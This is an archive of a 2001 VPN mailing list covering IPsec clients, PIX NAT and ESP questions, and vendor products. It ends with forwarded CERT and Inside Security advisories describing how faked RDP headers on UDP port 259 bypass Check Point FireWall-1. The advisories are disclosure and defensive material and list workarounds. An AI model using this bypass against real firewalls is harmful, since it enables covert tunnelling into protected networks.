From tbird at precision-guesswork.com Mon Jul 2 15:40:54 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Mon, 2 Jul 2001 14:40:54 -0500 (CDT) Subject: IPsec for Palm Message-ID: Does anyone out there have any experience with the Certicom IPsec client for Palm? The URL is http://www.certicom.com/products/movian/movianvpn_tech.html Thanks for any info -- tbird VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com VPN is sponsored by SecurityFocus.com From lists at fips.de Tue Jul 3 09:44:24 2001 From: lists at fips.de (Philipp Buehler) Date: Tue, 3 Jul 2001 15:44:24 +0200 Subject: SAP R/3 over IPSec VPN Message-ID: <20010703154424.A11629@pohl.fips.de> Hello, anyone experiences in tunneling SAP R/3 applications over an IPSec based VPN? RTT issues? Latencies .. TIA, ciao -- Philipp Buehler, aka fips | sysfive.com GmbH | BOfH | NUCH | #1: Break the clue barrier! #2: Already had buzzword confuseritis ? VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Tue Jul 3 17:31:10 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Tue, 3 Jul 2001 16:31:10 -0500 (CDT) Subject: IPsec for Palm (fwd) Message-ID: VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com ---------- Forwarded message ---------- Date: Tue, 3 Jul 2001 14:55:45 -0700 From: Basim Jaber To: 'Tina Bird' Subject: RE: IPsec for Palm Hi Tina, The Certicom VPN client works really well. Very easy to use. Configuration of the supported VPN gateways is straightforward and documented very well by Certicom. Deployment was via emailing the client to users. Config instructions were simple and users had no problems with them. The one thing I wish they had was split tunnelling support for the WinCE/PocketPC version (they have it for the PalmOS version, though). Performance was OK. --Basim >-----Original Message----- >From: Tina Bird [mailto:tbird at precision-guesswork.com] >Sent: Tuesday, July 03, 2001 11:00 AM >To: Basim Jaber >Subject: RE: IPsec for Palm > > >your impressions of how it works -- how did you deploy >it, what did and didn't work, what was performance like, >etc... > >On Mon, 2 Jul 2001, Basim Jaber wrote: > >> Date: Mon, 2 Jul 2001 19:49:11 -0700 >> From: Basim Jaber >> To: 'Tina Bird' , >vpn at securityfocus.com >> Subject: RE: IPsec for Palm >> >> Plenty experience here...whatcha need? >> >> > -----Original Message----- >> > From: Tina Bird [mailto:tbird at precision-guesswork.com] >> > Sent: Monday, July 02, 2001 12:41 PM >> > To: vpn at securityfocus.com >> > Subject: IPsec for Palm >> > >> > >> > Does anyone out there have any experience with the >> > Certicom IPsec client for Palm? The URL is >> > >> > http://www.certicom.com/products/movian/movianvpn_tech.html >> > >> > Thanks for any info -- tbird VPN is sponsored by SecurityFocus.com From l_santimano at yahoo.com Wed Jul 4 03:38:48 2001 From: l_santimano at yahoo.com (Louella Santimano) Date: Wed, 4 Jul 2001 00:38:48 -0700 (PDT) Subject: VPN Message-ID: <20010704073848.84237.qmail@web12301.mail.yahoo.com> How do I configure a machine from Network A to go to Network C using an IP address of Network B. Network B has VPNs set up to both Network A and Network C. What are the required routes and NAT rules? __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail http://personal.mail.yahoo.com/ VPN is sponsored by SecurityFocus.com From rgm at trusecure.com Wed Jul 4 14:20:22 2001 From: rgm at trusecure.com (Robert Moskowitz) Date: Wed, 04 Jul 2001 14:20:22 -0400 Subject: IPsec for Palm In-Reply-To: Message-ID: <5.1.0.14.2.20010704133631.01e59cd0@localhost> At 02:40 PM 7/2/2001 -0500, Tina Bird wrote: >Does anyone out there have any experience with the >Certicom IPsec client for Palm? The URL is > >http://www.certicom.com/products/movian/movianvpn_tech.html Aggressive mode with preshared keys. Of course, lots of clients use Aggressive mode, as the alternative is Main Mode with RSA sig (PKI req.). AFTER you get your PPP connection on your Palm, the demo I saw took about 40 secs to negotiate with D-H group 1. I think the alternative was D-H group 4 (ECC, gee now why would certicom use ECC :) that took lots less time.... Robert Moskowitz Senior Technical Director TruSecure Corporation (248) 968-9809 Fax: (248) 968-2824 rgm at trusecure.com There's no limit to what can be accomplished if it doesn't matter who gets the credit VPN is sponsored by SecurityFocus.com From jonc at haht.com Thu Jul 5 11:44:05 2001 From: jonc at haht.com (Jon Carnes) Date: Thu, 5 Jul 2001 11:44:05 -0400 Subject: VPN References: <20010704073848.84237.qmail@web12301.mail.yahoo.com> Message-ID: <00e001c10569$52b01160$0b04010a@JCARNES> ----- Original Message ----- > > How do I configure a machine from Network A to go to > Network C using an IP address of Network B. > Network B has VPNs set up to both Network A and > Network C. What are the required routes and NAT rules? Assuming that A and B pass traffic freely, and B and C pass traffic freely, then this is purely a function of routing. Each network should have a primary router or "gateway". You will need to add two routes: - on Network A's gateway, add the C network and point it at B's gateway address, - on Network C's gateway, add the A network and point it to B's gateway address. Once you have added these two routes, traffic will pass freely from A to C and back again. If the gateway machines also run firewall code, then you may need to modify the rules so that traffic flowing from A to C is allowed, as is traffic flowing from C to A. > > __________________________________________________ > Do You Yahoo!? > Get personalized email addresses from Yahoo! Mail > http://personal.mail.yahoo.com/ > > VPN is sponsored by SecurityFocus.com VPN is sponsored by SecurityFocus.com From cgripp at axcelerant.com Thu Jul 5 13:10:12 2001 From: cgripp at axcelerant.com (Christopher Gripp) Date: Thu, 5 Jul 2001 10:10:12 -0700 Subject: VPN Message-ID: <4EBB5C35607E7F48B4AE162D956666EF33907B@guam.corp.axcelerant.com> Sounds like you are talking about tunnel cascading. You can think of tunnel cascading as transitive trusts if you're familiar with Microsoft lingo. (e.g. A=>B,B=>C therefore A=>C. Without cascading a lot of routes have to be built. It all depends on what VPN you are using. On some, like the RedCreek and Netscreen it is an option you can turn on or off and the central VPN equipment routes it internally. On others you would have to add the routes on A, B and C. On the central VPN(B) it will unencrypt the source packets from (A), send it to a router that also needs to have the routes built out for all the networks, that router will send it back to the central vpn(B), which will reencrypt it and send it to the destination). So essentially, all parties involved have to know about ALL networks involved if 'tunnel cascading' isn't an option on the VPN box itself. Christopher S. Gripp Systems Engineer Axcelerant -----Original Message----- From: Louella Santimano [mailto:l_santimano at yahoo.com] Sent: Wednesday, July 04, 2001 12:39 AM To: vpn at securityfocus.com Subject: VPN How do I configure a machine from Network A to go to Network C using an IP address of Network B. Network B has VPNs set up to both Network A and Network C. What are the required routes and NAT rules? __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail http://personal.mail.yahoo.com/ VPN is sponsored by SecurityFocus.com VPN is sponsored by SecurityFocus.com From lists at fips.de Fri Jul 6 13:22:38 2001 From: lists at fips.de (Philipp Buehler) Date: Fri, 6 Jul 2001 19:22:38 +0200 Subject: ipsec "blackbox" Message-ID: <20010706192238.A26249@pohl.fips.de> Hi, since Radguard has stopped, and therefor their very nice product cIPro is no longer available, I would ask for similar Products (maybe someone bought the technology/design?). Key points: - ASIC based processing (no HDD) - easy auth from branches (certificate on a little token like a coin) - fast - no security breaches in history - failover management cIPro did all this and was relativly cheap (box for encrypting 128kbit/s <<1000 US$) The only embedded stuff I have found is SonicWall and Watchguard - but those have been too often on bugtraq, I would call them: development not really finished. Any more products like cIPro ? ciao -- Philipp Buehler, aka fips | sysfive.com GmbH | BOfH | NUCH | #1: Break the clue barrier! #2: Already had buzzword confuseritis ? VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Fri Jul 6 18:01:30 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Fri, 6 Jul 2001 17:01:30 -0500 (CDT) Subject: IETF drafts Message-ID: In revising my USENIX VPN class, I've stumbled across the following drafts which may be of interest: "Steps for IPsec Interoperability Testing" http://www.ietf.org/internet-drafts/draft-hoffman-ipsec-testing-01.txt "IPsec-NAT Compatibility Requirements" http://www.ietf.org/internet-drafts/draft-aboba-nat-ipsec-04.txt "Randomness Requirements for Security" http://www.ietf.org/internet-drafts/draft-eastlake-randomness2-02.txt "IPsec NAT-Traversal" http://www.ietf.org/internet-drafts/draft-stenberg-ipsec-nat-traversal-02.txt "Extended Authentication within IKE (XAUTH)" http://www.ietf.org/internet-drafts/draft-beaulieu-ike-xauth-01.txt "A Hybrid Authentication Mode for IKE" http://www.ietf.org/internet-drafts/draft-zegman-ike-hybrid-auth-00.txt I will add these links to the Standards and Crypto sections of the VPN Web site as appropriate. enjoy -- tbird VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com VPN is sponsored by SecurityFocus.com From sandy at storm.ca Sat Jul 7 00:57:06 2001 From: sandy at storm.ca (Sandy Harris) Date: Sat, 07 Jul 2001 00:57:06 -0400 Subject: ipsec "blackbox" References: <20010706192238.A26249@pohl.fips.de> Message-ID: <3B4696A2.2CE84481@storm.ca> Philipp Buehler wrote: > > Hi, > > since Radguard has stopped, and therefor their very nice > product cIPro is no longer available, I would ask for > similar Products (maybe someone bought the technology/design?). > > Key points: > - ASIC based processing (no HDD) > - easy auth from branches (certificate on a little token like a coin) > - fast > - no security breaches in history > - failover management > > cIPro did all this and was relativly cheap (box for encrypting 128kbit/s > <<1000 US$) > > The only embedded stuff I have found is SonicWall and Watchguard - but > those have been too often on bugtraq, I would call them: development > not really finished. > > Any more products like cIPro ? I don't know if any of them will suit you, but there's a list of products that use Linux FreeS/WAN IPSEC at: http://www.freeswan.org/freeswan_trees/freeswan-1.91/doc/intro.html#products It includes several black box firewall appliance products and a couple of Linux distributions that run from floppy or CD. VPN is sponsored by SecurityFocus.com From Dale.Shaw at praxa.com.au Sun Jul 8 06:06:35 2001 From: Dale.Shaw at praxa.com.au (Shaw, Dale) Date: Sun, 8 Jul 2001 20:06:35 +1000 Subject: How does this config work? Message-ID: Hi all, I guess questions are usually along the lines of 'how do I get this to work?'.. well, this one's different. I've inherited it, it's working, and I don't really know how :-) The scenario is this.. PIX firewall running (old) V4.4(1), PC on 'inside' network with the old 'Cisco Secure VPN Client' (V1.0 or V1.1 - not sure yet) accessing a host on the Internet over an IPSec VPN. I don't know what the peer is, but I presume it's a Cisco somethingorother. The PC has an RFC1918 address and the PIX *IS* doing NAT. The PIX has a 'static' IP assignment mapping the internal host's IP to a global address and although DHCP is in use on the inside network, this particular PC has a reservation so it's effectively static. Now, I thought that transport-mode ESP and NAT didn't play well or at all.. am I missing something? The PC uses a digital certificate for authentication if that makes any difference. I'm investigating this because I want to tighten up the conduits on the PIX - am I right in saying that the only conduits I need for this are for ESP from the peer to the global address of our PC? Right now there are a bunch of udp/isakmp and esp conduits. Cheers, Dale VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Sun Jul 8 11:33:37 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Sun, 8 Jul 2001 10:33:37 -0500 (CDT) Subject: How does this config work? In-Reply-To: Message-ID: Hi Dale -- The UDP/ISAKMP conduit on the PIX is allowing the digital certificate authentication and dynamic key management between the PC and the remote peer. It introduces a risk, in that you now have to allow UDP traffic through your PIX -- but it gives you the benefit of stronger authentication between the PC and the peer, as well as dynamic key generation. As usual the question to consider is which risk concerns you more -- the risk of an attacker compromising your shared secret and keys if you close the UDP conduit and revert to shared secrets and manual keying (ick, IMNSHO), or the risks associated with allowing UDP through your firewall. Have you taken a look at the PIX documentation in the how-to section of the VPN web page? It might help to compare what you've got to another configuration. cheers -- tbird On Sun, 8 Jul 2001, Shaw, Dale wrote: > Date: Sun, 8 Jul 2001 20:06:35 +1000 > From: "Shaw, Dale" > To: vpn at securityfocus.com > Subject: How does this config work? > > Hi all, > > I guess questions are usually along the lines of 'how do I get this to > work?'.. well, this one's different. I've inherited it, it's working, > and I don't really know how :-) > > The scenario is this.. PIX firewall running (old) V4.4(1), PC on 'inside' > network with the old 'Cisco Secure VPN Client' (V1.0 or V1.1 - not sure > yet) accessing a host on the Internet over an IPSec VPN. I don't know > what the peer is, but I presume it's a Cisco somethingorother. > > The PC has an RFC1918 address and the PIX *IS* doing NAT. The PIX has a > 'static' IP assignment mapping the internal host's IP to a global address > and although DHCP is in use on the inside network, this particular PC > has a reservation so it's effectively static. > > Now, I thought that transport-mode ESP and NAT didn't play well or at > all.. am I missing something? The PC uses a digital certificate for > authentication if that makes any difference. I'm investigating this > because I want to tighten up the conduits on the PIX - am I right in > saying that the only conduits I need for this are for ESP from the peer > to the global address of our PC? > > Right now there are a bunch of udp/isakmp and esp conduits. > > Cheers, > Dale > > VPN is sponsored by SecurityFocus.com > VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com VPN is sponsored by SecurityFocus.com From Dale.Shaw at praxa.com.au Sun Jul 8 18:36:50 2001 From: Dale.Shaw at praxa.com.au (Shaw, Dale) Date: Mon, 9 Jul 2001 08:36:50 +1000 Subject: How does this config work? Message-ID: Tina, Thanks for the reply. Sorry if this is redundant, but re-reading my original message I could've made the scenario clearer. The PC/IPSec -client- is *behind* the PIX, on its 'inside' network and is making a connection through it, outwards, to a peer on the Internet. There are no restrictions on outgoing traffic and there is no requirement for connections originating from the Internet to connect to a VPN gateway behind the PIX. Looking at the PIX example on the HOW-TO page, I'm not sure if this example is for my scenario or for a situation where clients connect to a VPN gateway located behind the PIX. In either scenario, I can understand why I would need the conduit for ESP, but why is it that a conduit for UDP/ISAKMP is required? Shouldn't the PIX take care of setting up a state entry for outgoing destination udp/500 so that only source udp/500 packets from the peer in question can come back? Back to the original issue - I thought Transport-mode ESP was troublesome with NAT. The page; http://www.linuxdoc.org/HOWTO/VPN-Masquerade-HOWTO-6.html lists some/all of the drawbacks. Here's the paragraph that makes me wonder how my setup is working at all.. "IPsec traffic using transport-mode ESP also cannot be reliably masqueraded. Transport mode ESP essentially encrypts everything after the IP header. Since, for example, the TCP and UDP checksums include the IP source and destination addresses, and the TCP/UDP checksum is within the encrypted payload and thus cannot be recalculated after the masquerade gateway alters the IP addresses, the TCP/UDP header will fail the checksum test at the remote gateway and the packet will be discarded. Protocols that do not include information about the source or destination IP addresses may successfully use masqueraded transport mode." We're not using PAT.. we're doing many:many - could this be a factor? Thanks, Dale > -----Original Message----- > From: Tina Bird [mailto:tbird at precision-guesswork.com] > Sent: Monday, July 09, 2001 1:34 AM > To: Shaw, Dale > Cc: vpn at securityfocus.com > Subject: Re: How does this config work? > > > Hi Dale -- > > The UDP/ISAKMP conduit on the PIX is allowing the > digital certificate authentication and dynamic > key management between the PC and the remote peer. > It introduces a risk, in that you now have to allow > UDP traffic through your PIX -- but it gives you the > benefit of stronger authentication between the PC > and the peer, as well as dynamic key generation. > As usual the question to consider is which risk > concerns you more -- the risk of an attacker > compromising your shared secret and keys if you > close the UDP conduit and revert to shared secrets > and manual keying (ick, IMNSHO), or the risks > associated with allowing UDP through your firewall. > > Have you taken a look at the PIX documentation in the > how-to section of the VPN web page? It might help to > compare what you've got to another configuration. > > cheers -- tbird > > On Sun, 8 Jul 2001, Shaw, Dale wrote: > > > Date: Sun, 8 Jul 2001 20:06:35 +1000 > > From: "Shaw, Dale" > > To: vpn at securityfocus.com > > Subject: How does this config work? > > > > Hi all, > > > > I guess questions are usually along the lines of 'how do I > get this to > > work?'.. well, this one's different. I've inherited it, > it's working, > > and I don't really know how :-) > > > > The scenario is this.. PIX firewall running (old) V4.4(1), > PC on 'inside' > > network with the old 'Cisco Secure VPN Client' (V1.0 or > V1.1 - not sure > > yet) accessing a host on the Internet over an IPSec VPN. I > don't know > > what the peer is, but I presume it's a Cisco somethingorother. > > > > The PC has an RFC1918 address and the PIX *IS* doing NAT. > The PIX has a > > 'static' IP assignment mapping the internal host's IP to a > global address > > and although DHCP is in use on the inside network, this > particular PC > > has a reservation so it's effectively static. > > > > Now, I thought that transport-mode ESP and NAT didn't play > well or at > > all.. am I missing something? The PC uses a digital certificate for > > authentication if that makes any difference. I'm investigating this > > because I want to tighten up the conduits on the PIX - am I right in > > saying that the only conduits I need for this are for ESP > from the peer > > to the global address of our PC? > > > > Right now there are a bunch of udp/isakmp and esp conduits. > > > > Cheers, > > Dale > > > > VPN is sponsored by SecurityFocus.com > > > > VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html > life: http://kubarb.phsx.ukans.edu/~tbird > work: http://www.counterpane.com > VPN is sponsored by SecurityFocus.com From paul at moquijo.com Sun Jul 8 20:01:16 2001 From: paul at moquijo.com (Paul Cardon) Date: Sun, 08 Jul 2001 20:01:16 -0400 Subject: How does this config work? References: Message-ID: <3B48F44C.20BCAD3@moquijo.com> "Shaw, Dale" wrote: > > Thanks for the reply. Sorry if this is redundant, but re-reading my > original message I could've made the scenario clearer. The PC/IPSec > -client- is *behind* the PIX, on its 'inside' network and is making a > connection through it, outwards, to a peer on the Internet. There are > no restrictions on outgoing traffic and there is no requirement for > connections originating from the Internet to connect to a VPN gateway > behind the PIX. Which side of the firewall the ipsec "client" and "server" are on and type of NAT are really not relevant to what is going on. The fact is you are traversing a NAT device which modifies packet headers causing problems with AH and transport mode ESP. > Looking at the PIX example on the HOW-TO page, I'm not sure if this > example is for my scenario or for a situation where clients connect to > a VPN gateway located behind the PIX. In either scenario, I can > understand why I would need the conduit for ESP, but why is it that a > conduit for UDP/ISAKMP is required? Shouldn't the PIX take care of > setting up a state entry for outgoing destination udp/500 so that only > source udp/500 packets from the peer in question can come back? The PIX does what you are describing as far as keeping state entries but your client is doing ESP in UDP encapsulation so that the ESP can survive NAT. It must also do UDP encapsulation on the ISAKMP. The association is being created for the original ESP packet not the encapsulated ESP. The original ISAKMP packet also needs to be preserved so that IP addresses and such in the IKE and ESP packets match. The Cisco client works this way. > Back to the original issue - I thought Transport-mode ESP was > troublesome with NAT. The page; > http://www.linuxdoc.org/HOWTO/VPN-Masquerade-HOWTO-6.html lists > some/all of the drawbacks. Here's the paragraph that makes me wonder > how my setup is working at all.. > > "IPsec traffic using transport-mode ESP also cannot be reliably > masqueraded. Transport mode ESP essentially encrypts everything after > the IP header. Since, for example, the TCP and UDP checksums include > the IP source and destination addresses, and the TCP/UDP checksum is > within the encrypted payload and thus cannot be recalculated after the > masquerade gateway alters the IP addresses, the TCP/UDP header will > fail the checksum test at the remote gateway and the packet will be > discarded. Protocols that do not include information about the source > or destination IP addresses may successfully use masqueraded transport > mode." The UDP encapsulation avoids that problem because the NAT affects only the UDP header and there is no modification of the original ESP packet. It will still have your non-translated, private side IP address in its header so that the encrypted TCP checksum is not affected. If you want a reference that describes how it works in gory detail, check out: http://www.ietf.org/internet-drafts/draft-ietf-ipsec-udp-encaps-00.txt Dale, I hope I've explained it reasonably clearly. -paul VPN is sponsored by SecurityFocus.com From paul at moquijo.com Sun Jul 8 20:53:10 2001 From: paul at moquijo.com (Paul Cardon) Date: Sun, 08 Jul 2001 20:53:10 -0400 Subject: How does this config work? References: <3B48F44C.20BCAD3@moquijo.com> Message-ID: <3B490076.AE110E56@moquijo.com> I'm correcting myself... Ughh Paul Cardon wrote: > > > Looking at the PIX example on the HOW-TO page, I'm not sure if this > > example is for my scenario or for a situation where clients connect to > > a VPN gateway located behind the PIX. In either scenario, I can > > understand why I would need the conduit for ESP, but why is it that a > > conduit for UDP/ISAKMP is required? Shouldn't the PIX take care of > > setting up a state entry for outgoing destination udp/500 so that only > > source udp/500 packets from the peer in question can come back? The conduit is only for inbound connections and would be needed for both IKE and ESP. In your scenario, where you are going outbound, it isn't used for any of the protocols. > The PIX does what you are describing as far as keeping state entries but > your client is doing ESP in UDP encapsulation so that the ESP can > survive NAT. It must also do UDP encapsulation on the ISAKMP. The > association is being created for the original ESP packet not the > encapsulated ESP. The original ISAKMP packet also needs to be preserved > so that IP addresses and such in the IKE and ESP packets match. The > Cisco client works this way. I also blew it on this part. The IKE on UDP port 500 is not further encapsulated in UDP to traverse a NAT device. That's what I get for scanning the draft document instead of re-reading that part carefully before responding. In any case, AH, ESP tunnel, and ESP transport can all be made to survive NAT using UDP encapsulation as described in the draft document. -paul VPN is sponsored by SecurityFocus.com From je at sekure.net Mon Jul 9 05:26:02 2001 From: je at sekure.net (Jonas Eriksson) Date: Mon, 9 Jul 2001 11:26:02 +0200 (CEST) Subject: IPSec between PIX and the Nokia CC500 Message-ID: Hi, Has anyone information to share about the subject? (IKE + IPSec) Regards Jonas VPN is sponsored by SecurityFocus.com From lrandall at isa-inc.com Mon Jul 9 15:43:42 2001 From: lrandall at isa-inc.com (Liam Randall) Date: Mon, 9 Jul 2001 15:43:42 -0400 Subject: FW: CERT Advisory CA-2001-17 Message-ID: <7683FAEA15B8804E885367DD0F0DE1CE9DCD@Exchange.isa-inc.com> Everyone catch this yet: -----Original Message----- From: CERT Advisory [mailto:cert-advisory at cert.org] Sent: Monday, July 09, 2001 1:33 PM To: cert-advisory at cert.org Subject: CERT Advisory CA-2001-17 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2001-17 Check Point RDP Bypass Vulnerability Original release date: July 09, 2001 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Check Point VPN-1 and FireWall-1 Version 4.1 Overview A vulnerability in Check Point FireWall-1 and VPN-1 may allow an intruder to pass traffic through the firewall on port 259/UDP. I. Description Inside Security GmbH has discovered a vulnerability in Check Point FireWall-1 and VPN-1 that allows an intruder to bypass the firewall. The default FireWall-1 management rules allow arbitrary RDP (Reliable Data Protocol) connections to traverse the firewall. RFC-908 and RFC-1151 describe the Reliable Data Protocol (RDP). Quoting from RFC-908: The Reliable Data Protocol (RDP) is designed to provide a reliable data transport service for packet-based applications such as remote loading and debugging. RDP was designed to have much of the same functionality as TCP, but it has some advantages over TCP in certain situations. FireWall-1 and VPN-1 include support for RDP, but they do not provide adequate security controls. Quoting from the advisory provided by Inside Security GmbH: By adding a faked RDP header to normal UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall. For more information, see the Inside Security GmbH security advisory, available at http://www.inside-security.de/advisories/fw1_rdp.html Although the CERT/CC has not seen any incident activity related to this vulnerability, we do recommend that all affected sites upgrade their Check Point software as soon as possible. II. Impact An intruder can pass UDP traffic with arbitrary content through the firewall on port 259 in violation of implied security policies. If an intruder can gain control of a host inside the firewall, he may be able to use this vulnerability to tunnel arbitrary traffic across the firewall boundary. Additionally, even if an intruder does not have control of a host inside the firewall, he may be able to use this vulnerability as a means of exploiting another vulnerability in software listening passively on the internal network. Finally, an intruder may be able to use this vulnerability to launch certain kinds of denial-of-service attacks. III. Solutions Install a patch from Check Point Software Technologies. More information is available in Appendix A. Until a patch can be applied, you may be able to reduce your exposure to this vulnerability by configuring your router to block access to 259/UDP at your network perimeter. Appendix A Check Point Check Point has issued an alert for this vulnerability at http://www.checkpoint.com/techsupport/alerts/ Download the patch from Check Point's web site: http://www.checkpoint.com/techsupport/downloads.html Appendix B. - References 1. http://www.inside-security.de/advisories/fw1_rdp.html 2. http://www.kb.cert.org/vuls/id/310295 3. http://www.ietf.org/rfc/rfc908.txt 4. http://www.ietf.org/rfc/rfc1151.txt _________________________________________________________________ Our thanks to Inside Security GmbH for the information contained in their advisory. _________________________________________________________________ This document was written by Ian A. Finlay. If you have feedback concerning this document, please send email to: mailto:cert at cert.org?Subject=Feedback CA-2001-17 [VU#310295] Copyright 2001 Carnegie Mellon University. Revision History July 09, 2001: Initial Release -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use Charset: noconv iQCVAwUBO0njBQYcfu8gsZJZAQHOCAP+L8JEWTsWqvWjZQaVpHPb6GHn7D837lzc rE/ef50+6xSzRZyBPXQ8+3N6JqYk8PBufYCcqtiqL1PfNJw3YfrGJ5irzS4ENXTg mupUNTfdG0UhEAOWJbsjykfB0K/PPaeFrtf1jod1zd9uKPIFytHLAzMHWzUwTTtW 4qSlIxoiHEQ= =v8vs -----END PGP SIGNATURE----- VPN is sponsored by SecurityFocus.com From tbird at precision-guesswork.com Mon Jul 9 13:58:56 2001 From: tbird at precision-guesswork.com (Tina Bird) Date: Mon, 9 Jul 2001 12:58:56 -0500 (CDT) Subject: Network Alchemy / Nokia CryptoCluster 500 boxes (fwd) Message-ID: VPN: http://kubarb.phsx.ukans.edu/~tbird/vpn.html life: http://kubarb.phsx.ukans.edu/~tbird work: http://www.counterpane.com ---------- Forwarded message ---------- Date: Sun, 8 Jul 2001 17:42:07 -0700 From: Jon Callas To: Tina Bird Subject: Network Alchemy / Nokia CryptoCluster 500 boxes I picked up a pair Network Alchemy / Nokia CryptoCluster 500 boxes in a failed dot-com selloff. They are about nine months old, and are the cool Network Alchemy black, rather than Nokia beige. They do IPsec, very cool address and port translation, and other things. They can be used as a redundant cluster with failover, or as two ends of a tunnel. They can handle up to 100 connections. Software including a windows IPsec client is available on the web. A CA for IPsec certs comes along with it, too. They list for $1250 each. I'm willing to sell one for $350 or the pair for $600. I'm selling because don't really need two of them. Information is available at and Jon VPN is sponsored by SecurityFocus.com From guy.raymakers at eds.com Tue Jul 10 02:27:49 2001 From: guy.raymakers at eds.com (Raymakers, Guy) Date: Tue, 10 Jul 2001 07:27:49 +0100 Subject: IPSec between PIX and the Nokia CC500 Message-ID: What we are doing is IPSec between Cisco IOS IPSec and CC500's. It's working fine, only there's one little problem in case the IPSec sessions get out of sync (e.g. reboot of the central system while the lifetime of some sessions is not yet expired...) . Then it might be needed to manually clear the sessions at one end. -----Original Message----- From: Jonas Eriksson [mailto:je at sekure.net] Sent: Monday, July 09, 2001 11:26 To: vpn at securityfocus.com Subject: IPSec between PIX and the Nokia CC500 Hi, Has anyone information to share about the subject? (IKE + IPSec) Regards Jonas VPN is sponsored by SecurityFocus.com VPN is sponsored by SecurityFocus.com From tim at starlipers.com Mon Jul 9 23:31:44 2001 From: tim at starlipers.com (Robert Starliper) Date: Mon, 9 Jul 2001 23:31:44 -0400 Subject: CERT Advisory CA-2001-17 Message-ID: Liam, Et. Al - There is an update to this notice - here is a post from Inside Security I just read on Bugtraq.... ---------------------------------------------------Begin Forwarded Message---------------------------------------------------------- Urgent! There is a slight mistake in Revision 1.2 of this advisory. RDP is proprietary protocol used by CheckPoint and therefore not described by RFC908, this RFC describes a different protocol unfortunately also called "RDP". Here is the corrected version: FOR PUBLIC RELEASE ------------------------------------------------------------------------ Inside Security GmbH Vulnerability Notification Revision 1.3 2001-07-09 ------------------------------------------------------------------------ The latest version of this document is available at http://www.inside-security.de/advisories/fw1_rdp.html ----------------------------------------------- Check Point FireWall-1 RDP Bypass Vulnerability ----------------------------------------------- Summary: It is possible to bypass FireWall-1 with faked RDP packets if the default implied rules are being used. RDP (Reliable Data Protocol, but not the one specified in RFC 908, a Check Point proprietary one) is used by FireWall-1 on top of the User Datagram Protocol (UDP) to establish encrypted sessions. FireWall-1 management rules allow arbitrary eitherbound RDP connections to traverse the firewall. Only the destination port (259) and the RDP command are verified by FireWall-1. By adding a faked RDP header to normal UDP traffic any content can be passed to port 259 on any remote host on either side of the firewall. Implied rules can't be easily modified or removed (except all together) with the FireWall-1 policy editor. Impact: Given access to hosts on both sides of a firewall a tunnel to bypass the firewall could be built using this vulnerability. Such access could be gained with a trojan horse that uses this vulnerability to connect from the inside back to the machine of the attacker. But also arbitrary connections from the outside to machines behind the firewall (even if they are supposedly totally blocked from the in- and outside by the firewall) can be established, for example to communicate with infiltrated programs like viruses. Affected systems: Check Point VPN-1(TM) & FireWall-1(R) Version 4.1 Releases tested: Build 41439 [VPN + DES] Build 41439 [VPN + DES + STRONG] Build 41716 [VPN + DES + STRONG] (SP2) Vendor status: The vulnerability has been reported to Check Point and a fix is scheduled for today. We want to thank Check Point Software Technologies for their quick reaction. Detailed description: As FireWall-1 rulesets are created they are translated into the INSPECT language (similar to C) and by default include the file $FWDIR/lib/base.def which itself includes $FWDIR/lib/crypt.def in line 259. Together they define protocol names and the so called implied rules (for FireWall-1 management). In line 62 the macro accept_fw1_rdp is defined to accept any eitherbound connection that matches the following characteristics: - Protocol UDP - Destination port 259 (RDP) - RDP Command RDPCRYPTCMD (100), RDPCRYPT_RESTARTCMD (101), RDPUSERCMD (150) or RDPSTATUSCMD (128). The RDP command types RDPCRYPT = {RDPCRYPTCMD,RDPUSERCMD,RDPSTATUSCMD} and RDPCRYPT_RESTART = {RDPCRYPT_RESTARTCMD} will permit traversal of faked RDP packets (regardless of the value of NO_ENCRYPTION_FEATURES, undefined by default). Proof of concept code: Proof of concept code has been submitted to Check Point. We are planning to make this code publicly available within a few days. Suggested workarounds: - Comment line 2646 of crypt.def ( accept_fw1_rdp; ) - Deactivate implied rules in the Check Point policy editor (and build your own rules for management connections). - Block UDP traffic to port 259 on your perimeter router. Credits: This vulnerability was found and documented by Jochen Thomas Bauer and Boris Wesslowski of Inside Security GmbH, Stuttgart, Germany. ------------------------------------------------------------------------ (C) 2001 Inside Security GmbH This notice may be redistributed freely provided that redistributed copies are complete and unmodified, and include all date and version information. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW. IN NO EVENT WILL INSIDE SECURITY GMBH BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN THIS SECURITY BULLETIN, EVEN IF INSIDE SECURITY GMBH HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. If any of the above provisions are held to be in violation of applicable law, void, or unenforceable in any jurisdiction, then such provisions are waived to the extent necessary for this disclaimer 